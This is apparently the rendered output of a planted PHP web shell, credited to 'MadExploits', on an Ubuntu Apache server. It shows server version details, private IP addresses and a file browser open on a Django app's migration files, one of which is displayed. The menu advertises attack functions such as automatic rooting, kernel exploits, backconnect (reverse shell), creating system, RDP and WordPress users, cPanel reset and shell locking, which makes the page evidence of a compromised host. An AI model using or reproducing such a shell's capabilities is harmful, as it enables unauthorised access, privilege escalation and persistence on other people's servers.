Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
vicas-dev /
register /
migrations /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
0001_initial.py
3.31
KB
-rw-r--r--
0002_auto_20250319_1310.py
469
B
-rw-r--r--
0003_auto_20250319_1332.py
1.26
KB
-rw-r--r--
0004_alter_customuser_id_alter...
660
B
-rw-r--r--
0005_alter_customuser_phone.py
445
B
-rw-r--r--
0006_alter_customuser_phone.py
418
B
-rw-r--r--
0007_student.py
827
B
-rw-r--r--
0008_auto_20250608_2221.py
851
B
-rw-r--r--
0009_profile_image.py
424
B
-rw-r--r--
0010_remove_profile_image.py
325
B
-rw-r--r--
0011_profile_image.py
426
B
-rw-r--r--
0012_auto_20250609_2327.py
1.27
KB
-rw-r--r--
__init__.py
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 0012_auto_20250609_2327.py
# Generated by Django 3.1.14 on 2025-06-09 17:57 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('register', '0011_profile_image'), ] operations = [ migrations.RemoveField( model_name='customuser', name='groups', ), migrations.RemoveField( model_name='customuser', name='user_permissions', ), migrations.DeleteModel( name='Student', ), migrations.RemoveField( model_name='profile', name='user', ), migrations.AddField( model_name='profile', name='full_name', field=models.CharField(blank=True, max_length=255, null=True), ), migrations.AddField( model_name='profile', name='password', field=models.CharField(default=1, max_length=128), preserve_default=False, ), migrations.AddField( model_name='profile', name='username', field=models.CharField(default=1, max_length=100, unique=True), preserve_default=False, ), migrations.DeleteModel( name='CustomUser', ), ]
Close